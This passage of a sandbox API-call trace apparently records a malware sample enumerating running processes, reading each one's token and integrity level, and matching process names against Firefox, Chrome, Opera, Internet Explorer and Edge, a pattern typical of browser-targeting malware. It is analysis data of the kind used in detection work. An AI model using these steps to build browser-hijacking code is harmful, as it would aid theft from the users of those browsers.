ReturnLength=0xfcfaa0) returned 1 [0235.069] CloseHandle (hObject=0x340) returned 1 [0235.069] CloseHandle (hObject=0x548) returned 1 [0235.069] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0235.069] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0235.069] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0235.069] GetLastError () returned 0x7a [0235.069] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0235.069] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0235.069] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0235.069] lstrcmpiW (lpString1="firefox.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0235.069] lstrcmpiW (lpString1="chrome.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned -1 [0235.069] lstrcmpiW (lpString1="opera.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0235.069] lstrcmpiW (lpString1="iexplore.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0235.069] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0235.069] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0235.069] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8a0) returned 0x548 [0235.069] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0235.069] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0235.069] GetLastError () returned 0x7a [0235.070] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0235.070] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0235.070] CloseHandle (hObject=0x340) returned 1 [0235.070] CloseHandle (hObject=0x548) returned 1 [0235.070] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0235.070] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0235.070] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0235.070] GetLastError () returned 0x7a [0235.070] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0235.070] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0235.070] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0235.070] lstrcmpiW (lpString1="firefox.exe", lpString2="colleague wrap.exe") returned 1 [0235.070] lstrcmpiW (lpString1="chrome.exe", lpString2="colleague wrap.exe") returned -1 [0235.070] lstrcmpiW (lpString1="opera.exe", lpString2="colleague wrap.exe") returned 1 [0235.070] lstrcmpiW (lpString1="iexplore.exe", lpString2="colleague wrap.exe") returned 1 [0235.070] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="colleague wrap.exe") returned 1 [0235.070] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="colleague wrap.exe") returned 1 [0235.070] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8b0) returned 0x548 [0235.070] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0235.070] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0235.070] GetLastError () returned 0x7a [0235.070] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0235.070] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0235.070] CloseHandle (hObject=0x340) returned 1 [0235.070] CloseHandle (hObject=0x548) returned 1 [0235.071] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0235.071] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0235.071] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0235.071] GetLastError () returned 0x7a [0235.071] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0235.071] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0235.071] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0235.071] lstrcmpiW (lpString1="firefox.exe", lpString2="hottest-jm-depression-fought.exe") returned -1 [0235.071] lstrcmpiW (lpString1="chrome.exe", lpString2="hottest-jm-depression-fought.exe") returned -1 [0235.071] lstrcmpiW (lpString1="opera.exe", lpString2="hottest-jm-depression-fought.exe") returned 1 [0235.071] lstrcmpiW (lpString1="iexplore.exe", lpString2="hottest-jm-depression-fought.exe") returned 1 [0235.071] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="hottest-jm-depression-fought.exe") returned 1 [0235.071] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="hottest-jm-depression-fought.exe") returned 1 [0235.071] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8c8) returned 0x548 [0235.071] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0235.071] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0235.071] GetLastError () returned 0x7a [0235.071] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0235.071] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0235.071] CloseHandle (hObject=0x340) returned 1 [0235.071] CloseHandle (hObject=0x548) returned 1 [0235.071] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0235.071] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0235.071] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0235.071] GetLastError () returned 0x7a [0235.071] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0235.072] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0235.072] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0235.072] lstrcmpiW (lpString1="firefox.exe", lpString2="saturday.exe") returned -1 [0235.072] lstrcmpiW (lpString1="chrome.exe", lpString2="saturday.exe") returned -1 [0235.072] lstrcmpiW (lpString1="opera.exe", lpString2="saturday.exe") returned -1 [0235.072] lstrcmpiW (lpString1="iexplore.exe", lpString2="saturday.exe") returned -1 [0235.072] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="saturday.exe") returned -1 [0235.072] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="saturday.exe") returned -1 [0235.072] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x954) returned 0x548 [0235.072] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0235.072] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0235.072] GetLastError () returned 0x7a [0235.072] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0235.072] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0235.072] CloseHandle (hObject=0x340) returned 1 [0235.072] CloseHandle (hObject=0x548) returned 1 [0235.072] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0235.072] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0235.072] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0235.072] GetLastError () returned 0x7a [0235.072] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0235.072] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0235.072] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0235.072] lstrcmpiW (lpString1="firefox.exe", lpString2="WINWORD.EXE") returned -1 [0235.072] lstrcmpiW (lpString1="chrome.exe", lpString2="WINWORD.EXE") returned -1 [0235.072] lstrcmpiW (lpString1="opera.exe", lpString2="WINWORD.EXE") returned -1 [0235.072] lstrcmpiW (lpString1="iexplore.exe", lpString2="WINWORD.EXE") returned -1 [0235.072] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="WINWORD.EXE") returned -1 [0235.072] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="WINWORD.EXE") returned -1 [0235.072] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9a0) returned 0x0 [0235.073] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9e0) returned 0x0 [0235.073] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbe8) returned 0x0 [0235.073] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6cc) returned 0x0 [0235.073] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa18) returned 0x0 [0235.073] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5fc) returned 0x548 [0235.073] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0235.073] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0235.073] GetLastError () returned 0x7a [0235.073] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0235.073] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0235.073] CloseHandle (hObject=0x340) returned 1 [0235.073] CloseHandle (hObject=0x548) returned 1 [0235.073] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0235.073] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0235.073] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0235.073] GetLastError () returned 0x7a [0235.073] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0235.073] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0235.073] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0235.073] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0235.073] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0235.073] lstrcmpiW (lpString1="opera.exe", lpString2="svchost.exe") returned -1 [0235.073] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0235.073] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="svchost.exe") returned -1 [0235.073] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="svchost.exe") returned -1 [0235.073] VirtualFree (lpAddress=0x340000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0235.074] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x7d0) returned 0x102 [0237.097] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0xfcfadc | out: SystemInformation=0x0, ResultLength=0xfcfadc*=0xc050) returned 0xc0000004 [0237.097] VirtualAlloc (lpAddress=0x0, dwSize=0xd050, flAllocationType=0x1000, flProtect=0x4) returned 0x340000 [0237.098] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x340000, Length=0xd050, ResultLength=0x0 | out: SystemInformation=0x340000, ResultLength=0x0) returned 0x0 [0237.098] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0237.098] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0237.099] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0237.099] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x14c) returned 0x0 [0237.099] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0237.099] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0237.099] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0237.099] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0237.099] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e4) returned 0x0 [0237.099] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1ec) returned 0x0 [0237.099] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x258) returned 0x0 [0237.099] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0237.099] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0x0 [0237.099] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0x0 [0237.099] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0 [0237.099] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0 [0237.099] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0237.099] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0237.099] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x160) returned 0x0 [0237.099] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x418) returned 0x0 [0237.099] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4dc) returned 0x0 [0237.099] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4e4) returned 0x548 [0237.100] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0237.100] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0237.100] GetLastError () returned 0x7a [0237.100] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0237.100] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0237.100] CloseHandle (hObject=0x340) returned 1 [0237.100] CloseHandle (hObject=0x548) returned 1 [0237.100] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0237.100] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0237.100] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0237.100] GetLastError () returned 0x7a [0237.100] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0237.100] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0237.100] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0237.100] lstrcmpiW (lpString1="firefox.exe", lpString2="taskhost.exe") returned -1 [0237.100] lstrcmpiW (lpString1="chrome.exe", lpString2="taskhost.exe") returned -1 [0237.100] lstrcmpiW (lpString1="opera.exe", lpString2="taskhost.exe") returned -1 [0237.100] lstrcmpiW (lpString1="iexplore.exe", lpString2="taskhost.exe") returned -1 [0237.100] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="taskhost.exe") returned -1 [0237.101] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="taskhost.exe") returned -1 [0237.101] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x560) returned 0x548 [0237.101] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0237.101] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0237.101] GetLastError () returned 0x7a [0237.101] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0237.101] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0237.101] CloseHandle (hObject=0x340) returned 1 [0237.101] CloseHandle (hObject=0x548) returned 1 [0237.101] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0237.101] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0237.101] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0237.101] GetLastError () returned 0x7a [0237.101] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0237.101] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0237.101] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0237.101] lstrcmpiW (lpString1="firefox.exe", lpString2="dwm.exe") returned 1 [0237.101] lstrcmpiW (lpString1="chrome.exe", lpString2="dwm.exe") returned -1 [0237.101] lstrcmpiW (lpString1="opera.exe", lpString2="dwm.exe") returned 1 [0237.101] lstrcmpiW (lpString1="iexplore.exe", lpString2="dwm.exe") returned 1 [0237.101] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="dwm.exe") returned 1 [0237.102] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="dwm.exe") returned 1 [0237.102] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x584) returned 0x548 [0237.102] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0237.102] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0237.102] GetLastError () returned 0x7a [0237.102] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, 